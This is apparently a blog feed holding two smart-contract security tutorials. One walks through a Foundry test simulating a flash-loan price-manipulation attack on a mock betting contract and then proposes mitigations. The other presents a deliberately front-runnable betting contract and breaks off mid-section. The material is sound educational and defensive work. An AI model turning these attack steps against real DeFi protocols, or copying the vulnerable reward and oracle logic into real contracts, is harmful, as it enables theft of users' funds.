1.  **Set the Stage with Normal Bets:** First, other players place their bets, creating a pool of funds in the contract. This makes everything seem normal and gives the attacker a baseline to work with.
2.  **Mess with the AMM:** The attacker temporarily alters the token reserves in the AMM, which acts as the contract’s price oracle. This shifts the price in their favor, making it look like their bet is worth much more than it actually is.
3.  **Place a Well-Timed Bet:** Once the price is manipulated, the attacker places a small bet on the dragon they know will win. With the price skewed, even a tiny bet can lead to a massive payout.
4.  **Cash Out Big:** Finally, the attacker resolves the bets, triggering the contract’s reward system. Thanks to the manipulated price, they claim a disproportionately large reward, repay any borrowed tokens (if using a flash loan), and walk away with a hefty profit.

```mermaid
sequenceDiagram
    participant Attacker as Attacker
    participant FlashLoan as Flash Loan Provider
    participant AMM as AMM/Oracle
    participant DragonBet as DragonBet Contract

    %% Step 1: Flash Loan Acquisition
    Attacker -&gt;&gt; FlashLoan: Requests flash loan of 1000 TokenB
    FlashLoan --&gt;&gt; Attacker: Provides 1000 TokenB

    %% Step 2: Price Manipulation in AMM
    Attacker -&gt;&gt; AMM: Increase reserve1 (TokenB) by 1000 TokenB
    Attacker -&gt;&gt; AMM: Decrease reserve0 (TokenA) to manipulate price
    Note over Attacker, AMM: AMM price becomes skewed (TokenB expensive)

    %% Step 3: Manipulated Price Used in DragonBet
    AMM --&gt;&gt; DragonBet: Reports manipulated price (winningPrice high)
    Attacker -&gt;&gt; DragonBet: Place minimum bet on winning dragon
    Note over Attacker, DragonBet: Bet placed with skewed price advantage

    %% Step 4: Reward Calculation &amp; Payout
    DragonBet -&gt;&gt; DragonBet: Calculate rewards using inflated winningPrice
    DragonBet --&gt;&gt; Attacker: Transfer inflated reward

    %% Step 5: Repay Flash Loan
    Attacker -&gt;&gt; FlashLoan: Repays 1000 TokenB loan

    %% Step 6: Profit Retention
    Attacker --&gt;&gt; Attacker: Keeps net profit
    Note over DragonBet: Unfair rewards due to manipulated price


```

### **Setup: Initializing the Test Environment**

Before running the test, the script sets up the environment with tokens, a mock AMM, and the `DragonBet` contract. Tokens are minted and distributed to participants, and the AMM is initialized with equal reserves of `TokenA` and `TokenB` to create a balanced price.

```solidity
function setUp() public {
    tokenA = new MockToken(&quot;TokenA&quot;, &quot;TKA&quot;);
    tokenB = new MockToken(&quot;TokenB&quot;, &quot;TKB&quot;);
    amm = new MockAMM();

    dragonBet = new DragonBet(
        address(tokenA),
        address(tokenB),
        address(amm)
    );

    tokenB.mint(attacker, 100 ether);
    tokenB.mint(bettor1, 100 ether);
    tokenB.mint(bettor2, 100 ether);

    tokenB.mint(address(dragonBet), 10_000 ether);

    tokenA.mint(address(amm), 3_000 ether);
    tokenB.mint(address(amm), 3_000 ether);

    vm.startPrank(attacker);
    tokenB.approve(address(dragonBet), type(uint256).max);
    vm.stopPrank();

    vm.startPrank(bettor1);
    tokenB.approve(address(dragonBet), type(uint256).max);
    vm.stopPrank();

    vm.startPrank(bettor2);
    tokenB.approve(address(dragonBet), type(uint256).max);
    vm.stopPrank();

    amm.setReserves(3_000 ether, 3_000 ether); // Initial price: 1 TokenB = 1 TokenA
}

```

This setup ensures that:

1.  The AMM has an initial 1:1 price ratio between `TokenA` and `TokenB`, based on reserves of 3,000 each.
2.  The `DragonBet` contract is pre-funded with enough `TokenB` to pay out rewards.
3.  All participants approve the contract to handle their tokens for betting.

### **Legitimate Bets**

Two bettors place legitimate bets on dragon 1 to create a baseline for the betting pool. Bettor 1 wagers 5 `TokenB`, and Bettor 2 wagers 1 `TokenB`.

```solidity
vm.startPrank(bettor1);
dragonBet.placeBet(1, 5 ether);
vm.stopPrank();

vm.startPrank(bettor2);
dragonBet.placeBet(1, 1 ether);
vm.stopPrank();

```

The `placeBet` function verifies the amount is greater than zero and transfers the specified `TokenB` from the bettor to the contract. After these operations, the total bets in the contract amount to 6 `TokenB`, entirely placed on dragon 1.

The internal state after this step:

-   Total bets: `6 TokenB`.
-   Bet distribution: `6 TokenB` on dragon 1, `0 TokenB` on dragon 2.

### **Flash Loan**

The attacker uses a flash loan to temporarily borrow 1,000 `TokenB`. This loan will be repaid later, but in the meantime, it provides liquidity for manipulating the AMM reserves.

```solidity
uint256 flashLoanAmount = 1_000 ether;
tokenB.mint(attacker, flashLoanAmount);

```

Here, the `mint` function of `MockToken` simulates a flash loan by directly increasing the attacker&apos;s balance. Flash loans in real systems are typically provided by DeFi protocols like Aave or dYdX, allowing large sums to be borrowed without collateral if repaid in the same transaction.

**Attacker&apos;s balance after flash loan:** `1,100 TokenB`.

### **Price Manipulation**

The attacker alters the AMM reserves, increasing `TokenB` and decreasing `TokenA`. This skews the price of `TokenA` upward.

```solidity
uint256 addedTokenB = 1_000 ether;
uint256 removedTokenA = (amm.reserveA() * addedTokenB) / amm.reserveB();

amm.setReserves(
    amm.reserveA() - removedTokenA,
    amm.reserveB() + addedTokenB
);

```

The attacker deposits 1,000 `TokenB` into the AMM and removes a proportional amount of `TokenA`. In a real AMM this shift would occur through a swap governed by the constant product formula ($x \cdot y = k$); here the mock simply sets the new reserves directly. Either way, `TokenA` becomes relatively scarcer, so its price doubles.

**Updated AMM reserves:**

-   `reserveA (TokenA): 2,000`.
-   `reserveB (TokenB): 4,000`.

The spot price of `TokenA` quoted in `TokenB` is now:

$$\text{price} = \frac{\text{reserveB}}{\text{reserveA}} = \frac{4000}{2000} = 2$$
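The reserve arithmetic can be verified with a quick sketch (plain Python standing in for the Solidity math; the variable names are illustrative, not from the contract):

```python
# AMM reserves before the manipulation (TokenA, TokenB)
reserve_a, reserve_b = 3_000, 3_000

# Attacker deposits 1,000 TokenB and withdraws a proportional amount of TokenA
added_token_b = 1_000
removed_token_a = reserve_a * added_token_b // reserve_b  # mirrors the Solidity expression

reserve_a -= removed_token_a
reserve_b += added_token_b

# Spot price of TokenA quoted in TokenB
price_a = reserve_b / reserve_a

print(removed_token_a)        # 1000
print(reserve_a, reserve_b)   # 2000 4000
print(price_a)                # 2.0
```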

### **Placing the Manipulated Bet**

The attacker places a 1 `TokenB` bet on dragon 2, strategically positioning themselves to exploit the manipulated price during reward calculation.

```solidity
dragonBet.placeBet(2, 1 ether);

```

This bet adds 1 `TokenB` to dragon 2, increasing the total bets in the contract to 7 `TokenB`. The attacker is now the sole bettor on dragon 2, ensuring they will receive all rewards if dragon 2 wins.

**Internal state after this step:**

-   Total bets: `7 TokenB`.
-   Bet distribution: `6 TokenB` on dragon 1, `1 TokenB` on dragon 2.

### **Resolving the Bets**

The bets are resolved, and dragon 2 is declared the winner. The attacker’s reward is calculated using the manipulated price.

```solidity
dragonBet.resolveBet(2);

```

The reward for the attacker is calculated using the formula in the contract:

$$\text{Reward} = \frac{\text{attackerBet} \cdot \text{totalBets} \cdot \text{winningPrice}}{\text{totalWinningBets}}$$

Where:

$$\text{attackerBet} = 1\ \text{TokenB} \\ \text{totalBets} = 7\ \text{TokenB (sum of all bets)} \\ \text{winningPrice} = 2\ \text{TokenB per TokenA} \\ \text{totalWinningBets} = 1\ \text{TokenB (only the attacker bet on dragon 2)}$$

Substituting:  

$$\text{Reward} = \frac{1 \cdot 7 \cdot 2}{1} = 14\ \text{TokenB}$$

The attacker receives **14 TokenB** as their reward, draining this amount from the contract&apos;s balance. Had the price not been manipulated, the attacker would have only received **7 TokenB** as their reward, proportional to their bet size relative to the total pool and based on the unaltered price of **1 TokenB per TokenA**.
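A quick sanity check of the payout, in plain Python mirroring the contract’s formula (with the integer division Solidity would perform):

```python
# Reward formula from the contract: bet * totalBets * winningPrice / totalWinningBets
attacker_bet = 1        # TokenB, placed on dragon 2
total_bets = 7          # TokenB across both dragons
total_winning_bets = 1  # only the attacker backed dragon 2

manipulated_price = 2   # TokenB per TokenA after the reserve skew
honest_price = 1        # the unmanipulated 1:1 price

reward_manipulated = attacker_bet * total_bets * manipulated_price // total_winning_bets
reward_honest = attacker_bet * total_bets * honest_price // total_winning_bets

print(reward_manipulated, reward_honest)  # 14 7
```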

### **Repaying the Flash Loan**

After receiving the reward, the attacker repays the flash loan, ensuring no collateral was required for the attack.

```solidity
tokenB.transfer(address(this), flashLoanAmount);

```

The loan of 1,000 `TokenB` is repaid, leaving the attacker with the remaining tokens as pure profit.

**Attacker’s balance after repayment:** `113 TokenB` (initial 100 + flash loan 1,000 - bet 1 + reward 14 - loan repayment 1,000).
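Tracing the attacker’s `TokenB` balance through every step confirms the figure (a plain-Python tally, not contract code):

```python
balance = 100      # initial mint to the attacker
balance += 1_000   # flash loan (simulated via mint)
balance -= 1       # bet placed on dragon 2
balance += 14      # inflated reward from resolveBet
balance -= 1_000   # flash loan repaid

print(balance)  # 113, i.e. 13 TokenB of pure profit over the initial 100
```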

### **Final Balances**

The script checks the final balances to confirm the attacker’s profit and validate the attack&apos;s success.

```solidity
uint256 attackerBalanceAfter = tokenB.balanceOf(attacker);
uint256 bettor1BalanceAfter = tokenB.balanceOf(bettor1);
uint256 bettor2BalanceAfter = tokenB.balanceOf(bettor2);

console.log(&quot;Attacker balance after: &quot;, toEth(attackerBalanceAfter));
console.log(&quot;Bettor 1 balance after: &quot;, toEth(bettor1BalanceAfter));
console.log(&quot;Bettor 2 balance after: &quot;, toEth(bettor2BalanceAfter));

```

![](/content/images/2024/12/image-6.png)

Final Results

# Top 3 Strategies to Mitigate Flash Loan Vulnerabilities

Among the various solutions to prevent flash loan exploits, the following three strategies stand out as the most critical for ensuring robust smart contract security:

#### **Time-Weighted Average Price (TWAP)**

Instead of relying on a spot price fetched directly from an AMM, use a **Time-Weighted Average Price (TWAP)**. This approach calculates an average price over a specified time window, significantly reducing the impact of short-term price manipulation.

```solidity
function getPrice() public view returns (uint256) {
    // Use TWAP from the price oracle
    return priceOracle.consult(address(tokenA), 1e18);
}

```
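To see why averaging blunts a single-block spike, here is a minimal TWAP sketch in plain Python; the window length and sample values are illustrative, not taken from any specific oracle:

```python
def twap(price_samples):
    # Time-weighted average over equally spaced price observations
    return sum(price_samples) / len(price_samples)

# Nine blocks at the honest 1:1 price, one flash-loan-manipulated block at 2.0
samples = [1.0] * 9 + [2.0]
print(twap(samples))  # 1.1, far from the 2.0 spot price the attacker needs
```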

#### **Cap Rewards Based on Logical Limits**

Set a maximum reward cap based on logical limits, such as a multiplier of the total bets or a hard-coded maximum payout value. This ensures that even if the price is manipulated, the attacker cannot drain the entire contract balance.

```solidity
function resolveBet(uint256 winningDragonId) external {
    uint256 winningPrice = getPrice();
    Bet[] memory winningBets = bets[winningDragonId];
    uint256 totalWinningBets = 0;

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        totalWinningBets += winningBets[i].amount;
    }

    require(totalWinningBets &gt; 0, &quot;No bets placed on the winning dragon&quot;);

    uint256 rewardCap = totalBets * 2; // Limit rewards to 2x the total pool

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        uint256 reward = (winningBets[i].amount * totalBets * winningPrice) / totalWinningBets / 1e18;

        // Apply the cap
        if (reward &gt; rewardCap) {
            reward = rewardCap;
        }

        uint256 contractBalance = tokenB.balanceOf(address(this));
        if (reward &gt; contractBalance) {
            reward = contractBalance;
        }

        require(tokenB.transfer(winningBets[i].user, reward), &quot;Transfer failed&quot;);
    }

    totalBets = 0;
    delete bets[winningDragonId];
}

```

#### **Commit-Reveal Mechanism**

A commit-reveal mechanism for placing bets can prevent attackers from reacting to price manipulations during the same transaction. Bettors first submit a hashed commitment of their bet, which is revealed in a later phase. This adds a layer of unpredictability to the system, reducing the attacker’s ability to time their exploits effectively.

```solidity
mapping(address =&gt; bytes32) public committedBets;

function commitBet(bytes32 hashedBet) external {
    committedBets[msg.sender] = hashedBet;
}

function revealBet(uint256 amount, uint256 dragonId, bytes32 salt) external {
    require(
        keccak256(abi.encodePacked(amount, dragonId, salt)) == committedBets[msg.sender],
        &quot;Invalid reveal&quot;
    );
    delete committedBets[msg.sender]; // Clear the commitment
    placeBet(dragonId, amount); // Proceed with the revealed bet
}


```
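The same commit-reveal flow can be sketched off-chain in plain Python; `sha256` stands in for Solidity’s `keccak256`, and the packing scheme is illustrative:

```python
import hashlib

def commit(amount, dragon_id, salt):
    # Stand-in for keccak256(abi.encodePacked(amount, dragonId, salt))
    packed = amount.to_bytes(32, "big") + dragon_id.to_bytes(32, "big") + salt
    return hashlib.sha256(packed).digest()

committed = {}

# Commit phase: only the hash goes on-chain, so mempool watchers learn nothing
committed["bettor"] = commit(1, 2, b"secret-salt")

# Reveal phase: the contract recomputes the hash and compares
def reveal(user, amount, dragon_id, salt):
    if commit(amount, dragon_id, salt) != committed[user]:
        raise ValueError("Invalid reveal")
    del committed[user]          # clear the commitment
    return (dragon_id, amount)   # the contract would call placeBet here

print(reveal("bettor", 1, 2, b"secret-salt"))  # (2, 1)
```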

# Conclusions: Key Takeaways

Flash loan vulnerabilities demonstrate the inherent challenges of balancing transparency and security in decentralized systems. Through the **DragonBet** case study, we’ve seen how external price manipulation can disrupt the fairness of a protocol. Here are the key takeaways:

1.  **External Dependencies Are Risky**: Relying on external data sources, such as AMMs, without validation makes protocols susceptible to manipulation. Strengthening oracles and adding safeguards is crucial.
2.  **Testing Is Essential**: Comprehensive testing, including simulating attacks, can reveal weaknesses that might otherwise go unnoticed in production environments.
3.  **Mitigation Strategies Exist**: Techniques like time-weighted average prices, commit-reveal schemes, and capped reward payouts can significantly reduce the impact of exploits.

By understanding these vulnerabilities and implementing robust mitigation strategies, developers can create DeFi systems that are not only innovative but also secure and resilient.

### References

1.  Foundry - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
2.  Solidity - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
3.  OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
4.  Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
5.  Testing Ethereum Smart Contracts - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/tutorials/testing](https://book.getfoundry.sh/tutorials/testing)
6.  Decentralized Exchanges and AMMs - Key Mechanics and Risks. &quot;Uniswap Documentation.&quot; Available at: [https://docs.uniswap.org/](https://docs.uniswap.org/)
7.  Gas Price Mechanics - Understanding Gas and Transaction Fees in Ethereum. &quot;Ethereum Documentation.&quot; Available at: [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
8.  Price Oracles and Their Role in DeFi. &quot;Chainlink Documentation.&quot; Available at: [https://docs.chain.link/](https://docs.chain.link/)
9.  Flash Loan Attacks in DeFi - Case Studies and Mitigations. &quot;CertiK Blog.&quot; Available at: [https://www.certik.com/](https://www.certik.com/)</content:encoded><author>Ruben Santos</author></item><item><title>Simulating Front-Running Attacks in Ethereum: A Deep Dive with Foundry and Anvil</title><link>https://www.kayssel.com/post/web3-5</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-5</guid><description>This article explores front-running vulnerabilities in Ethereum smart contracts using the BiomechanicalRace case study. It simulates attacks with Anvil, Cast, and a custom validator, analyzing gas price impacts and proposing secure design solutions like commit-reveal schemes to prevent exploits.</description><pubDate>Sun, 01 Dec 2024 12:13:27 GMT</pubDate><content:encoded># **What is a Front-Running Vulnerability?**

In the world of blockchain, where transparency is both a strength and a potential weakness, a front-running vulnerability is a type of exploit that takes advantage of the visibility of transactions in the mempool (the waiting area where transactions are queued before being added to the blockchain). Essentially, it&apos;s a form of transaction hijacking where an attacker anticipates another user&apos;s transaction and inserts their own with a higher gas fee to ensure it is processed first.

Let’s break it down:

When you submit a transaction to a blockchain, it doesn&apos;t get added to a block immediately. Instead, it goes into the mempool, where miners (or validators) prioritize which transactions to process based on gas fees. A front-runner monitors this mempool, identifies valuable transactions, and submits a similar transaction with a higher gas fee. The miner, incentivized to maximize profit, will typically include the front-runner’s transaction first, allowing the attacker to gain an advantage.

This vulnerability is particularly prevalent in decentralized finance (DeFi), token swaps, and NFT marketplaces, where timing and order of transactions can significantly impact outcomes. For example:

-   In token trades, an attacker can buy tokens before a large buy order and sell them at a profit once the price rises.
-   In betting systems, they can place larger bets just ahead of other participants to disproportionately benefit from the payout structure.

Front-running isn&apos;t a flaw in blockchain technology itself but rather a side effect of the transparent and open nature of decentralized systems. While blockchain&apos;s transparency ensures trustlessness and security, it also means that transaction details are visible to everyone, including attackers.

To understand this better, let’s dive into an example where we simulate a front-running attack on a smart contract.

# Vulnerable Smart Contract

In this chapter, we’re going to test a front-running vulnerability in a smart contract. Like in the previous chapter, we’ll use **Foundry** instead of Hardhat to run our tests. If you’re unfamiliar with Foundry or need help setting it up, refer back to the [earlier chapter for a detailed guide on configuration](https://www.kayssel.com/post/web3-4/). For now, let’s focus on understanding the contract we’ll be working with.

The smart contract, `BiomechanicalRace`, represents a simple betting system where users can place bets on racing creatures. After the race concludes, the bettors who backed the winning creature can claim rewards proportional to their contributions. Let’s break it down step by step, examining its functionality and structure through its code.

&lt;details&gt;
&lt;summary&gt;All code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract BiomechanicalRace {
    struct Creature {
        string name;
        uint256 totalBets; // Total ETH bet on this creature
    }

    bool public raceFinished;
    uint256 public totalBets;
    uint256 public multiplier = 100; // Initial multiplier (100%)
    uint256 public multiplierStep = 10; // Each bet decreases the multiplier by 10%

    mapping(uint256 =&gt; Creature) public creatures; // Mapping of creatures
    mapping(address =&gt; mapping(uint256 =&gt; uint256)) public bets; // Bets by user and creature
    mapping(address =&gt; uint256) public rewards; // Rewards for each user after the race

    address[] public participants; // List of all participants
    mapping(address =&gt; bool) public hasPlacedBet; // To avoid duplicate entries in the participant list

    constructor() {
        // Initialize creatures for the race
        creatures[1] = Creature(&quot;CyberLynx&quot;, 0);
        creatures[2] = Creature(&quot;MechaEagle&quot;, 0);
    }

    /**
     * @dev Allows users to place a bet on a specific creature.
     * @param creatureId The ID of the creature to bet on.
     */
    function placeBet(uint256 creatureId) external payable {
        require(!raceFinished, &quot;Race has already ended&quot;);
        require(msg.value &gt; 0, &quot;Bet amount must be greater than zero&quot;);
        require(
            bytes(creatures[creatureId].name).length &gt; 0,
            &quot;Invalid creature ID&quot;
        );
        require(multiplier &gt; 0, &quot;Multiplier depleted&quot;);

        // Apply the multiplier to the bet
        uint256 adjustedBet = (msg.value * multiplier) / 100;

        // Update bet data
        creatures[creatureId].totalBets += adjustedBet;
        totalBets += adjustedBet;
        bets[msg.sender][creatureId] += adjustedBet;

        // Add the participant to the list if not already added
        if (!hasPlacedBet[msg.sender]) {
            participants.push(msg.sender);
            hasPlacedBet[msg.sender] = true;
        }

        // Reduce the multiplier for the next bet
        if (multiplier &gt; multiplierStep) {
            multiplier -= multiplierStep;
        } else {
            multiplier = 0; // Ensure multiplier does not go negative
        }
    }

    /**
     * @dev Ends the race and calculates rewards for the winning creature&apos;s bettors.
     * @param winnerId The ID of the winning creature.
     */
    function endRace(uint256 winnerId) external {
        require(!raceFinished, &quot;Race already ended&quot;);
        require(
            bytes(creatures[winnerId].name).length &gt; 0,
            &quot;Invalid winner ID&quot;
        );

        raceFinished = true;

        uint256 totalWinnerBets = creatures[winnerId].totalBets;

        // Assign rewards proportional to each user&apos;s winning bet
        for (uint256 i = 0; i &lt; participants.length; i++) {
            address user = participants[i];
            uint256 userBet = bets[user][winnerId];
            if (userBet &gt; 0) {
                rewards[user] =
                    (userBet * address(this).balance) /
                    totalWinnerBets;
            }
        }
    }

    /**
     * @dev Allows users to claim their winnings after the race has ended.
     */
    function claimWinnings() external {
        require(raceFinished, &quot;Race is not finished yet&quot;);
        uint256 winnings = rewards[msg.sender];
        require(winnings &gt; 0, &quot;No winnings to claim&quot;);

        rewards[msg.sender] = 0;
        payable(msg.sender).transfer(winnings);
    }

    /**
     * @dev Returns the list of participants who placed bets in the race.
     * @return An array of participant addresses.
     */
    function getParticipants() external view returns (address[] memory) {
        return participants;
    }
}

```
&lt;/details&gt;


#### **Data Structures**

The contract begins by defining its core data structure, a `Creature`. Each creature has a name and tracks the total ETH bet on it. Additionally, the contract maintains a flag to check if the race has concluded (`raceFinished`), tracks the total amount of ETH bet across all creatures, and introduces a unique `multiplier` mechanic to incentivize early betting.

Here’s the relevant part of the code:

```solidity
struct Creature {
    string name;
    uint256 totalBets; // Total ETH bet on this creature
}

bool public raceFinished;
uint256 public totalBets;
uint256 public multiplier = 100; // Initial multiplier (100%)
uint256 public multiplierStep = 10; // Each bet decreases the multiplier by 10%

```

The contract also uses mappings to store bets, calculate rewards, and keep track of participants. A dynamic array, `participants`, stores all bettors, ensuring no duplicate entries through the `hasPlacedBet` mapping.

```solidity
mapping(uint256 =&gt; Creature) public creatures; // Mapping of creatures
mapping(address =&gt; mapping(uint256 =&gt; uint256)) public bets; // Bets by user and creature
mapping(address =&gt; uint256) public rewards; // Rewards for each user after the race
address[] public participants; // List of all participants
mapping(address =&gt; bool) public hasPlacedBet; // To avoid duplicate entries in the participant list

```

#### **Placing a Bet**

The `placeBet` function allows users to bet on a specific creature. Before processing the bet, it performs several checks:

-   The race must still be active.
-   The amount bet must be greater than zero.
-   The specified creature ID must be valid.
-   The `multiplier` must still have value to apply adjustments to the bet.

Once these conditions are met, the bet is adjusted using the `multiplier`, rewarding early bettors with higher effective contributions. The adjusted bet is added to the chosen creature’s total bets, and the bettor’s details are updated. If the bettor is new, they’re added to the `participants` list.

Here’s how it’s implemented:

```solidity
function placeBet(uint256 creatureId) external payable {
    require(!raceFinished, &quot;Race has already ended&quot;);
    require(msg.value &gt; 0, &quot;Bet amount must be greater than zero&quot;);
    require(bytes(creatures[creatureId].name).length &gt; 0, &quot;Invalid creature ID&quot;);
    require(multiplier &gt; 0, &quot;Multiplier depleted&quot;);

    uint256 adjustedBet = (msg.value * multiplier) / 100;
    creatures[creatureId].totalBets += adjustedBet;
    totalBets += adjustedBet;
    bets[msg.sender][creatureId] += adjustedBet;

    if (!hasPlacedBet[msg.sender]) {
        participants.push(msg.sender);
        hasPlacedBet[msg.sender] = true;
    }

    if (multiplier &gt; multiplierStep) {
        multiplier -= multiplierStep;
    } else {
        multiplier = 0;
    }
}

```

This function not only tracks bets but also adjusts the `multiplier`, ensuring it decreases over time to encourage early participation.

#### **Ending the Race**

Once the race concludes, the `endRace` function is used to determine the winning creature and calculate rewards for its backers. The function verifies that the race has not already ended and that the winning creature ID is valid. It then calculates the total amount of ETH bet on the winning creature and iterates over all participants to assign rewards proportional to their contributions.

&lt;details&gt;
&lt;summary&gt;The code for this logic is as follows:&lt;/summary&gt;

```solidity
function endRace(uint256 winnerId) external {
    require(!raceFinished, &quot;Race already ended&quot;);
    require(bytes(creatures[winnerId].name).length &gt; 0, &quot;Invalid winner ID&quot;);

    raceFinished = true;

    uint256 totalWinnerBets = creatures[winnerId].totalBets;

    for (uint256 i = 0; i &lt; participants.length; i++) {
        address user = participants[i];
        uint256 userBet = bets[user][winnerId];
        if (userBet &gt; 0) {
            rewards[user] = (userBet * address(this).balance) / totalWinnerBets;
        }
    }
}

```
&lt;/details&gt;


This function finalizes the race, preventing further bets, and prepares the `rewards` mapping for users to claim their winnings.

#### **Claiming Winnings**

After the race is completed and rewards are calculated, users can claim their winnings using the `claimWinnings` function. The function ensures that:

-   The race has concluded.
-   The user has winnings to claim.

If these conditions are met, it transfers the calculated amount to the user and resets their reward balance.

```solidity
function claimWinnings() external {
    require(raceFinished, &quot;Race is not finished yet&quot;);
    uint256 winnings = rewards[msg.sender];
    require(winnings &gt; 0, &quot;No winnings to claim&quot;);

    rewards[msg.sender] = 0;
    payable(msg.sender).transfer(winnings);
}

```

This function ensures that only legitimate claims are processed and that rewards are paid out efficiently.

#### **Participants Management**

To facilitate the reward calculation process, the contract maintains a list of all participants through the `participants` array. The `getParticipants` function provides a way to retrieve this list, allowing anyone to view the bettors involved in the race.

```solidity
function getParticipants() external view returns (address[] memory) {
    return participants;
}

```

# **Exploiting the Front-Running Vulnerability**

Now that we’ve explored the `BiomechanicalRace` contract in detail, let’s delve into the strategy for exploiting its vulnerability. The contract&apos;s design, particularly its use of a diminishing multiplier to reward early bets, makes it susceptible to front-running attacks. In this section, we’ll outline the exploitation strategy and then walk through the test case that simulates this attack using Foundry.

## **The Exploitation Strategy**

The front-running attack leverages the transparency of the blockchain, specifically the way transactions are prioritized and processed based on gas fees. In this simulation, we’ll break down how the attack is executed step by step while showcasing the tools and scripts used to replicate it.

#### **Monitoring the Mempool**

In a real-world scenario, an attacker continuously monitors the mempool (the transaction queue) for incoming bets placed by other participants. The attacker’s goal is to identify these transactions, especially those with lower gas prices, which are less likely to be prioritized by validators.

In this simulation, we mimic the mempool monitoring process using our **custom validator**. The validator scans and prioritizes transactions based on their gas prices. This gives us a controlled environment to simulate the behavior of a front-runner while maintaining the integrity of our attack simulation.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    &lt;strong&gt;Note&lt;/strong&gt;: While we won’t automate the mempool monitoring process for the attacker in this chapter, such a script would be very similar to the custom validator script. Instead of prioritizing transactions for mining, the attacker would analyze the mempool to detect specific patterns or targets (like Player1’s bet) and respond by crafting their own higher-priority transactions.
  &lt;/div&gt;
&lt;/div&gt;

#### **Placing a Front-Running Transaction**

Once the attacker detects Player1’s transaction in the mempool, they respond by crafting their own transaction with a higher gas fee. The higher gas fee ensures that validators process the attacker’s transaction first, granting them priority access to the contract’s diminishing multiplier.

In this simulation:

1.  **Player1’s Bet**: Player1 places a bet on a creature with a gas price of `70 gwei`.
2.  **Attacker’s Bet**: The attacker places a competing bet with a gas price of `80 gwei`.

By using our **custom validator**, we ensure that the attacker’s higher gas price gives them priority, and their transaction is mined before Player1’s.

#### **Benefiting from the Multiplier Advantage**

The **BiomechanicalRace** contract uses a diminishing multiplier system to incentivize early betting. The first bet processed receives the highest multiplier, and subsequent bets see progressively lower rewards.

-   **Attacker’s Transaction**: Mined first, benefiting from a higher multiplier, resulting in a better-adjusted bet.
-   **Player1’s Transaction**: Mined later, with a reduced multiplier, leading to less favorable terms.

The custom validator simulates this prioritization realistically, enabling us to observe the attacker’s advantage clearly.
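The multiplier advantage is easy to quantify; here is a plain-Python sketch mirroring the contract’s `adjustedBet` arithmetic (the bet sizes are illustrative):

```python
multiplier, step = 100, 10  # contract starts at 100% and drops 10% per bet

def adjusted_bet(value, m):
    # Mirrors: adjustedBet = (msg.value * multiplier) / 100
    return value * m // 100

# Attacker front-runs, so their bet is mined first at the full 100% multiplier
attacker_adjusted = adjusted_bet(1_000, multiplier)
multiplier -= step

# Player1's identical bet lands second, at only 90%
player1_adjusted = adjusted_bet(1_000, multiplier)

print(attacker_adjusted, player1_adjusted)  # 1000 900
```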

#### **Claiming Rewards**

After the race concludes and the winning creature is declared:

1.  **The Player and Attacker Claim Winnings**: The rewards are distributed based on the adjusted bets and total pool of ETH.
2.  **Disproportionate Rewards**: Due to the front-running, the attacker claims a significantly larger share of the rewards compared to Player1.

## Simulating the Attack Using Anvil, Cast, and a Custom Validator

In the previous chapter, we explored how to analyze vulnerabilities using Foundry’s built-in testing mechanisms, leveraging its powerful framework to write and execute automated tests directly in Solidity. This time, we’ll take a slightly different approach to broaden our perspective and explore additional tools in the blockchain development ecosystem. Specifically, we’ll simulate a vulnerability using **Anvil** and **Cast**, alongside a custom-built validator, to replicate real-world scenarios and gain a deeper understanding of how these tools interact and function in practice.

### What is Anvil?

**Anvil** is a powerful tool provided by the Foundry suite, designed to act as a lightweight, high-speed local Ethereum node. It serves as a testing and development blockchain, similar to tools like Ganache or Hardhat Network. Anvil enables developers to simulate blockchain environments for smart contract testing, debugging, and experimentation.

**Key features of Anvil include:**

-   A fully-featured local blockchain environment with instant transaction processing.
-   Preconfigured accounts with ETH for testing purposes.
-   The ability to manipulate block timing, mining, and chain state for fine-grained control.
-   Seamless integration with Foundry&apos;s tools like **forge** and **cast**.

![](/content/images/2024/11/image-26.png)

Example of Anvil after running

### What is Cast?

**Cast** is a command-line interface tool within the Foundry ecosystem that allows developers to interact directly with Ethereum networks. It’s highly versatile, enabling everything from sending transactions to querying contract state and balances.

**Key features of Cast include:**

-   Simple commands for deploying contracts and interacting with smart contracts.
-   Support for querying blockchain data, such as balances, gas prices, and block details.
-   Compatibility with both local (Anvil) and live networks.

&lt;details&gt;
&lt;summary&gt;Here is an example of using forge to deploy the vulnerable contract:&lt;/summary&gt;

```bash
forge create src/BiomechanicalRace.sol:BiomechanicalRace --private-key 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80  --rpc-url &quot;http://localhost:8545&quot;
[⠊] Compiling...
[⠆] Compiling 1 files with Solc 0.8.28
[⠰] Solc 0.8.28 finished in 166.76ms
Compiler run successful!
Deployer: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266
Deployed to: 0x5FbDB2315678afecb367f032d93F642f64180aa3
Transaction hash: 0x33382874b2c20d8a59c8e7ae9b499f0eeee8bb20f042879008a787d2857e90ca

```
&lt;/details&gt;


### Setting the Stage for the Attack Simulation

For this simulation, we will leverage both **Anvil** and **Cast** to recreate a realistic blockchain environment where we execute and observe the behavior of a front-running attack.

-   **Anvil** will provide the blockchain infrastructure, with accounts funded and transactions processed locally, mimicking the Ethereum mainnet.
-   **Cast** will allow us to programmatically deploy contracts, send transactions, and monitor balances.

### Introducing the Custom Validator

